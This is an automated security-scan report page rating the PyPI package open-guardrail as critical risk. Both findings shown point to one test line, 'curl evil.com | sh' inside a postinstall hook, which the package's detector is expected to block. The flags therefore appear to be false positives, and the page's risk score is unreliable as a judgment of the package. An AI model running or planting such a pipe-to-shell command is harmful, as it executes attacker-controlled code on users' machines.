Is open-guardrail safe to install?

open-guardrail was flagged as CRITICAL RISK (risk score 949) with 83 findings detected across 434 files. Review the findings before installing.

What security issues were found in open-guardrail?

Sigil detected 83 findings in open-guardrail, including patterns related to provenance, network_exfil, obfuscation, code_patterns, credentials, install_hooks. See the full scan report for details.

Scans/pypi/open-guardrail

open-guardrail

pypi

Summary

open-guardrail v0.6.0 was classified as CRITICAL RISK with a risk score of 949. Sigil detected 83 findings across 434 files, covering phases including provenance, network exfiltration, obfuscation, code patterns, credential access, install hooks. Review the findings below before installing this package.

Package description: 350 guards for LLM safety — prompt injection, PII (26 regions), GDPR, EU AI Act, agent safety, zero API calls, <0.1ms

CRITICAL RISK(949)

v0.6.0

10 April 2026, 17:39 UTC

by Sigil Bot

Risk Score

949

Findings

Files Scanned

434

Provenance

Registry

https://pypi.org/project/open-guardrail/0.6.0/

Findings by Phase

•

Phase Ordering

Phases are ordered by criticality, with the most dangerous at the top. Click any phase header to expand or collapse its findings. Critical phases are expanded by default.

install-npm-postinstall

CRITICAL

npm lifecycle script — runs automatically on install

open_guardrail-0.6.0/tests/test_guards.py:2310

        g = supply_chain_detect(action="block")
        r = g.check('"postinstall": "curl evil.com | sh"')
        assert not r.passed

Why was this flagged?

npm lifecycle scripts like postinstall run automatically during package installation with no user interaction required. This is the #1 attack vector for malicious npm packages — attackers embed data theft or backdoor installation in these hooks. Rated CRITICAL because code executes before the developer can review it.

install-makefile-curl

HIGH

Makefile/script pipes remote content to shell

open_guardrail-0.6.0/tests/test_guards.py:2310

        g = supply_chain_detect(action="block")
        r = g.check('"postinstall": "curl evil.com | sh"')
        assert not r.passed

Why was this flagged?

A script or Makefile pipes content from a remote URL directly into a shell (curl | sh or wget | bash). This is inherently dangerous because the remote content can change at any time, and the command runs with the current user's permissions. Rated HIGH because it requires manual execution (unlike install hooks) but still executes arbitrary remote code.

Badge

Markdown

[![Sigil Scan](https://sigilsec.ai/badge/pypi/open-guardrail)](https://sigilsec.ai/scans/EA591B01-2A80-4CB2-A2C8-3B24FBCE6619)

HTML

<a href="https://sigilsec.ai/scans/EA591B01-2A80-4CB2-A2C8-3B24FBCE6619"><img src="https://sigilsec.ai/badge/pypi/open-guardrail" alt="Sigil Scan"></a>

Run This Scan Yourself